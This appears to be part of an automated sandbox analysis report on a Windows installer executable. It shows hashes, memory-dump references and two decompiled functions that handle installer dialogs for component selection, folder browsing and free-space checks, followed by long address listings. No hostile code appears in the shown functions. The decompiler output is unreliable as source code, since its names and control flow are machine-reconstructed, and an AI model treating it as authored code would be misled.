                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID: {
                                                                                    • API String ID: 590372296-366298937
                                                                                    • Opcode ID: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                    • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                    • Opcode Fuzzy Hash: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                    • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 97%
                                                                                    			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					 *0x420490 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                    0x00404871
                                                                                    0x00404877
                                                                                    0x00404879
                                                                                    0x0040487f
                                                                                    0x00404885
                                                                                    0x00404892
                                                                                    0x0040489b
                                                                                    0x0040489e
                                                                                    0x004048a1
                                                                                    0x00404ac9
                                                                                    0x00404ad0
                                                                                    0x00404ae4
                                                                                    0x00404ad2
                                                                                    0x00404ad4
                                                                                    0x00404ad7
                                                                                    0x00404ad8
                                                                                    0x00404adf
                                                                                    0x00404adf
                                                                                    0x00404af0
                                                                                    0x00404afe
                                                                                    0x00404b01
                                                                                    0x00404b17
                                                                                    0x00404b8f
                                                                                    0x00404b92
                                                                                    0x00404b94
                                                                                    0x00404b9e
                                                                                    0x00404bac
                                                                                    0x00404bac
                                                                                    0x00404bae
                                                                                    0x00404bb8
                                                                                    0x00404bbe
                                                                                    0x00404bdf
                                                                                    0x00404bc0
                                                                                    0x00404bcd
                                                                                    0x00404bcd
                                                                                    0x00404bbe
                                                                                    0x00404bb8
                                                                                    0x00000000
                                                                                    0x00404b92
                                                                                    0x00404b1c
                                                                                    0x00404b27
                                                                                    0x00404b2c
                                                                                    0x00404b33
                                                                                    0x00404b3a
                                                                                    0x00404b44
                                                                                    0x00404b44
                                                                                    0x00404b48
                                                                                    0x00404b4d
                                                                                    0x00404b52
                                                                                    0x00404b68
                                                                                    0x00404b54
                                                                                    0x00404b54
                                                                                    0x00404b5c
                                                                                    0x00404b63
                                                                                    0x00404b5e
                                                                                    0x00404b5e
                                                                                    0x00404b5e
                                                                                    0x00404b5c
                                                                                    0x00404b6c
                                                                                    0x00404b6e
                                                                                    0x00404b7c
                                                                                    0x00404b7d
                                                                                    0x00404b89
                                                                                    0x00404b8c
                                                                                    0x00404b8c
                                                                                    0x00404b4d
                                                                                    0x00000000
                                                                                    0x00404b3a
                                                                                    0x00404b1e
                                                                                    0x00404b25
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404be2
                                                                                    0x00404be2
                                                                                    0x00404be9
                                                                                    0x00404c5d
                                                                                    0x00404c64
                                                                                    0x00404c70
                                                                                    0x00404c70
                                                                                    0x00404c79
                                                                                    0x00404c7b
                                                                                    0x00404c82
                                                                                    0x00404c85
                                                                                    0x00404c85
                                                                                    0x00404c8b
                                                                                    0x00404c92
                                                                                    0x00404c95
                                                                                    0x00404c95
                                                                                    0x00404c9b
                                                                                    0x00404ca1
                                                                                    0x00404ca7
                                                                                    0x00404ca7
                                                                                    0x00404cb4
                                                                                    0x00404e01
                                                                                    0x00404e08
                                                                                    0x00404e25
                                                                                    0x00404e2b
                                                                                    0x00404e3d
                                                                                    0x00404e3d
                                                                                    0x00000000
                                                                                    0x00404cba
                                                                                    0x00404cbc
                                                                                    0x00404cc4
                                                                                    0x00404cc8
                                                                                    0x00404cc8
                                                                                    0x00404cd0
                                                                                    0x00404d11
                                                                                    0x00404d13
                                                                                    0x00404d23
                                                                                    0x00404d26
                                                                                    0x00404d2b
                                                                                    0x00404d32
                                                                                    0x00404d35
                                                                                    0x00404dd7
                                                                                    0x00404ddd
                                                                                    0x00404deb
                                                                                    0x00404dfc
                                                                                    0x00404dfc
                                                                                    0x00000000
                                                                                    0x00404deb
                                                                                    0x00404d3b
                                                                                    0x00404d3e
                                                                                    0x00404d44
                                                                                    0x00404d49
                                                                                    0x00404d4b
                                                                                    0x00404d4d
                                                                                    0x00404d53
                                                                                    0x00404d5a
                                                                                    0x00404d5f
                                                                                    0x00404d66
                                                                                    0x00404d69
                                                                                    0x00404d69
                                                                                    0x00404d70
                                                                                    0x00404d7c
                                                                                    0x00404d80
                                                                                    0x00404d82
                                                                                    0x00404d82
                                                                                    0x00404d72
                                                                                    0x00404d74
                                                                                    0x00404d74
                                                                                    0x00404da2
                                                                                    0x00404dae
                                                                                    0x00404dbd
                                                                                    0x00404dbd
                                                                                    0x00404dbf
                                                                                    0x00404dc2
                                                                                    0x00404dcb
                                                                                    0x00000000
                                                                                    0x00404cd2
                                                                                    0x00404cdd
                                                                                    0x00404ce0
                                                                                    0x00404ce5
                                                                                    0x00404ce7
                                                                                    0x00404ceb
                                                                                    0x00404cfb
                                                                                    0x00404d05
                                                                                    0x00404d07
                                                                                    0x00404d0a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404ced
                                                                                    0x00404ced
                                                                                    0x00404cf3
                                                                                    0x00404cf5
                                                                                    0x00404cf5
                                                                                    0x00404cf6
                                                                                    0x00404cf7
                                                                                    0x00000000
                                                                                    0x00404ced
                                                                                    0x00404cd0
                                                                                    0x00404cb4
                                                                                    0x00404bf1
                                                                                    0x00000000
                                                                                    0x00404c07
                                                                                    0x00404c11
                                                                                    0x00404c16
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404c28
                                                                                    0x00404c2d
                                                                                    0x00404c39
                                                                                    0x00404c39
                                                                                    0x00404c3b
                                                                                    0x00404c4a
                                                                                    0x00404c4c
                                                                                    0x00404c53
                                                                                    0x00404c56
                                                                                    0x00000000
                                                                                    0x00404c56
                                                                                    0x00404bf1
                                                                                    0x004048a7
                                                                                    0x004048ac
                                                                                    0x004048b6
                                                                                    0x004048b7
                                                                                    0x004048c0
                                                                                    0x004048cb
                                                                                    0x004048d6
                                                                                    0x004048dc
                                                                                    0x004048ea
                                                                                    0x004048ff
                                                                                    0x00404904
                                                                                    0x0040490f
                                                                                    0x00404918
                                                                                    0x0040492d
                                                                                    0x0040493e
                                                                                    0x0040494b
                                                                                    0x0040494b
                                                                                    0x00404950
                                                                                    0x00404956
                                                                                    0x00404958
                                                                                    0x0040495b
                                                                                    0x00404960
                                                                                    0x00404965
                                                                                    0x00404967
                                                                                    0x00404967
                                                                                    0x00404987
                                                                                    0x00404987
                                                                                    0x00404989
                                                                                    0x0040498a
                                                                                    0x0040498f
                                                                                    0x00404992
                                                                                    0x00404995
                                                                                    0x00404999
                                                                                    0x0040499e
                                                                                    0x004049a3
                                                                                    0x004049a7
                                                                                    0x004049ac
                                                                                    0x004049b1
                                                                                    0x004049b3
                                                                                    0x004049bb
                                                                                    0x00404a85
                                                                                    0x00404a98
                                                                                    0x00000000
                                                                                    0x004049c1
                                                                                    0x004049c4
                                                                                    0x004049c7
                                                                                    0x004049ca
                                                                                    0x004049ca
                                                                                    0x004049d0
                                                                                    0x004049d6
                                                                                    0x004049d9
                                                                                    0x004049df
                                                                                    0x004049e0
                                                                                    0x004049e5
                                                                                    0x004049ee
                                                                                    0x004049f5
                                                                                    0x004049f8
                                                                                    0x004049fb
                                                                                    0x004049fe
                                                                                    0x00404a3a
                                                                                    0x00404a63
                                                                                    0x00404a3c
                                                                                    0x00404a49
                                                                                    0x00404a49
                                                                                    0x00404a00
                                                                                    0x00404a03
                                                                                    0x00404a12
                                                                                    0x00404a1c
                                                                                    0x00404a24
                                                                                    0x00404a2b
                                                                                    0x00404a33
                                                                                    0x00404a33
                                                                                    0x004049fe
                                                                                    0x00404a69
                                                                                    0x00404a6a
                                                                                    0x00404a76
                                                                                    0x00404a76
                                                                                    0x00404a83
                                                                                    0x00404a9e
                                                                                    0x00404aa2
                                                                                    0x00404abf
                                                                                    0x00404ac4
                                                                                    0x00404ac7
                                                                                    0x00000000
                                                                                    0x00404aa4
                                                                                    0x00404aa9
                                                                                    0x00404ab2
                                                                                    0x00404e3f
                                                                                    0x00404e51
                                                                                    0x00404e51
                                                                                    0x00404aa2
                                                                                    0x00000000
                                                                                    0x00404a83
                                                                                    0x004049bb

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 1638840714-813528018
                                                                                    • Opcode ID: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                    • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                    • Opcode Fuzzy Hash: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                    • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404356, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t162);
					E00405DC8(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t162);
							if(E0040573A(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t162);
							_t145 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t162);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004056A0(0x41f468) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f458);
									} else {
										E004046F1(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403F3A(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x42048c == _t145) {
									E004042EB();
								}
								 *0x42048c = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t162;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t162, 0x41f870, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405659(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405B88(0x3fb, 0x4204a0, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x4204a0) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004056C6(_t162) != 0 && E004056ED(_t162) == 0) {
						E00405659(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t159);
					E00403F4D(_v12);
					_t138 = E00405E88(7);
					if(_t138 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                                                                                    0x0040435c
                                                                                    0x00404363
                                                                                    0x0040436f
                                                                                    0x0040437d
                                                                                    0x00404385
                                                                                    0x00404389
                                                                                    0x0040438f
                                                                                    0x0040438f
                                                                                    0x0040439b
                                                                                    0x0040440f
                                                                                    0x00404416
                                                                                    0x004044eb
                                                                                    0x004044f2
                                                                                    0x00404501
                                                                                    0x00404501
                                                                                    0x00404505
                                                                                    0x0040450b
                                                                                    0x00404518
                                                                                    0x0040451a
                                                                                    0x0040451a
                                                                                    0x00404528
                                                                                    0x0040452d
                                                                                    0x00404530
                                                                                    0x00404537
                                                                                    0x0040453a
                                                                                    0x00404571
                                                                                    0x00404573
                                                                                    0x00404579
                                                                                    0x00404580
                                                                                    0x00404582
                                                                                    0x00404582
                                                                                    0x0040459e
                                                                                    0x004045da
                                                                                    0x00000000
                                                                                    0x004045a0
                                                                                    0x004045a3
                                                                                    0x004045b7
                                                                                    0x004045b9
                                                                                    0x00000000
                                                                                    0x004045b9
                                                                                    0x0040453c
                                                                                    0x00404540
                                                                                    0x0040456f
                                                                                    0x0040456f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404542
                                                                                    0x00404542
                                                                                    0x0040454f
                                                                                    0x00404554
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404558
                                                                                    0x0040455a
                                                                                    0x0040455a
                                                                                    0x00404565
                                                                                    0x00404568
                                                                                    0x0040456d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040456d
                                                                                    0x004045c8
                                                                                    0x004045cf
                                                                                    0x004045d6
                                                                                    0x004045dd
                                                                                    0x004045dd
                                                                                    0x004045e2
                                                                                    0x004045e4
                                                                                    0x004045ec
                                                                                    0x004045f2
                                                                                    0x004045f2
                                                                                    0x00404602
                                                                                    0x0040460c
                                                                                    0x00404614
                                                                                    0x0040462a
                                                                                    0x00404616
                                                                                    0x0040461a
                                                                                    0x0040461a
                                                                                    0x00404614
                                                                                    0x0040462f
                                                                                    0x00404634
                                                                                    0x00404639
                                                                                    0x00404642
                                                                                    0x00404642
                                                                                    0x0040464b
                                                                                    0x0040464d
                                                                                    0x0040464d
                                                                                    0x00404659
                                                                                    0x00404661
                                                                                    0x0040466b
                                                                                    0x0040466b
                                                                                    0x00404670
                                                                                    0x00000000
                                                                                    0x00404670
                                                                                    0x0040453a
                                                                                    0x004044f4
                                                                                    0x004044fb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004044fb
                                                                                    0x0040441c
                                                                                    0x00404422
                                                                                    0x0040443c
                                                                                    0x00404441
                                                                                    0x0040444b
                                                                                    0x00404452
                                                                                    0x00404461
                                                                                    0x00404464
                                                                                    0x00404467
                                                                                    0x0040446e
                                                                                    0x00404476
                                                                                    0x00404479
                                                                                    0x0040447d
                                                                                    0x00404484
                                                                                    0x0040448c
                                                                                    0x004044e4
                                                                                    0x0040448e
                                                                                    0x0040448f
                                                                                    0x00404496
                                                                                    0x004044a0
                                                                                    0x004044a8
                                                                                    0x004044b5
                                                                                    0x004044c9
                                                                                    0x004044cd
                                                                                    0x004044cd
                                                                                    0x004044c9
                                                                                    0x004044d2
                                                                                    0x004044dd
                                                                                    0x004044dd
                                                                                    0x0040448c
                                                                                    0x00000000
                                                                                    0x00404441
                                                                                    0x0040442f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404435
                                                                                    0x00000000
                                                                                    0x0040439d
                                                                                    0x0040439d
                                                                                    0x004043a9
                                                                                    0x004043b3
                                                                                    0x004043c0
                                                                                    0x004043c0
                                                                                    0x004043c6
                                                                                    0x004043cf
                                                                                    0x004043d8
                                                                                    0x004043db
                                                                                    0x004043de
                                                                                    0x004043e6
                                                                                    0x004043e9
                                                                                    0x004043ec
                                                                                    0x004043f4
